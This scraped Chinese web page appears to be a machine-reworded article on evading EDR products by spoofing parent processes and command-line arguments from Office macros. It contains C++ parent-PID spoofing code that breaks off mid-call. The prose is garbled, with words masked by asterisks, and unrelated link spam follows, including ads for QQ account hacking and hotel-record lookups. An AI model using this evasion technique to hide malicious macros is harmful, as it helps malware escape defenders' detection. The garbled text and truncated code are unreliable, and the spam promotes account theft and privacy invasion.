绕开EDR:结构Office宏欺骗父进程和命令行参数
一、情况
大部分当代EDR解决 *** 都应用个人行为检验的 *** ,容许依据其个人行为来检验恶意程序,而不是只是应用IoC(比如:文档hash值、网站域名)。在本文中,我得出了欺骗新进程的父进程和命令行参数这二种技术的VBA完成方式。该类完成容许制做更为隐秘的Office宏,并使宏形成的进程看上去好像由另一个程序流程(比如explorer.exe)建立的,并具备看起来良好的命令行参数。
必须表明的是,我并不是明确提出这种技术的创作者,这种技术是由Will Burgess、Didier Stevens和Casey Smith明确提出的。
更先,大家将解读在Visual Basic中完成的技术情况。我之一次听见这种內容,是在Wild West Hackin’ Fest 2018中听到了Will Burgess的演说以后。
1.1 父进程欺骗
当进程派生出子进程时,比如Sy *** on这类的EDR解决 *** 会纪录该实际操作,另外会纪录各种各样信息,比如:新创建的进程名字、hash值、可实行途径及其相关父进程的信息。这针对预制构件个人行为标准十分有协助,例如,“Microsoft Word始终不容易派生出powershell.exe”。依据我的工作经验,这种标准具备较低的多元性、较高的增加值,仅在非常少状况下能产生乱报。
事实上,在应用Windows当地API建立进程时,能够特定一切进程做为父亲进程。这并并不是一个新鲜事儿,因而我不想在文中中更为详尽地叙述。事实上,Didier Stevens早在十年前就读过有关这一方面的文章内容。下边是一个C 编码的实例供大伙儿参照,将应用随意进程做为父进程,派生出cmd.exe。
// 本编码根据
#include "pch.h"
#include
#include
#include
#include
int main(int argc, char **canttrustthis)
{
PROCESS_INFORMATION pi={ 0 };
STARTUPINFOEXA si={ 0 };
SIZE_T sizeToAllocate;
int parentPid=9524; // Could be found dynamically as well
// Get a handle on the parent process to use
HANDLE processHandle=OpenProcess(PROCESS_ALL_ACCESS, false, parentPid);
if (processHandle==NULL){
fprintf(stderr, "OpenProcess failed");
return 1;
}
// Initialize the process start attributes
InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
// Allocate the size needed for the attribute list
si.lpAttributeList=(LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeToAllocate);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
// Set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS option to specify the parent process to use
if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &processHandle, sizeof(HANDLE), NULL, NULL)){
fprintf(stderr, "UpdateProcThreadAttribute failed");
return 1;
}
si.StartupInfo.cb=sizeof(STARTUPINFOEXA);
printf("Creating process...
");
BOOL success=CreateProcessA(
NULL, // App name
"C:\\\\Windows\\\\system32\\\\calc.exe", // Command line
NULL, // Process attributes
NULL, // Thread attributes
true, // Inherits handles?
EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, // Creation flags
NULL, // Env
"C:\\\\Windows\\\\system32", // Current dir
(LPSTARTUPINFOA) &si,
&pi
相关文章
2020查开宾馆记录app(免费查开宾馆记录查询软件)
不清楚大伙儿针对weixin里的微信聊天记录,看上去是啥觉得呢?很多人都感觉要是是微信聊天记录,大家都是会挑选不被他人见到。而不被他人见到的方法,便是挑选把这种纪录整盘删掉。那怎样做才可以查询被删掉的...
加盟韩风源烧烤自助餐厅必须具备哪些条件?火爆项目引发顾客好感
社会的发展已经变得非常的迅速,在不断的发展过程中人们也逐渐的重视到饮食的健康问题,所以很多的人都会想要一种特色有营养的食品,近几年的特色餐饮品牌可谓是发展的非常火爆。韩风源烧烤自助餐厅加盟虽然是烧烤行...
帮忙找qq的黑客高手,网络黑客诈骗案例,黑客破解锁屏密码对手机有破坏吗
实践来说,该脚本十分简略有用,文件中的每个元素加载完结之后,将会进行以下操作:今日咱们要介绍的 Authy 则是根据第二种方法的双要素认证,是一种更强壮更便利的解决方案,而且能够很好的兼容一切运用 G...
教育部:坚持教材“凡叶梓萱选必审” 严肃查处违规选
资料图:2019年9月1日,福州中山小学五年级学生在阅读统一部编版的语文教材。张斌 摄 中新网客户端12月24日电(郎朗)24日,教育部召开发布会。教育部教材局局长田慧生表示,要把好教材选用使用...
国家不管黑客(国家网络为什么没有黑客厉害)
本文导读目录: 1、对于黑客的存在国家持什么态度 2、国家为什么不严厉打击网络黑客和计算器木马病毒? 3、黑客犯法吗? 4、黑客是违法的吗 5、黑客的行为是否合法??? 6、黑客犯...
2015年谷歌搜索引擎排名怎么做(2015年影响谷歌搜索引擎排名的因素观察
百度搜索百度站长工具(Chinaz.com)注:不久前,百度搜索百度搜索引擎科研综合服务平台searchmetrics公布了二零一五年的伤害Google百度搜索百度搜索引擎的因素观查科学研究叙述,不同...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!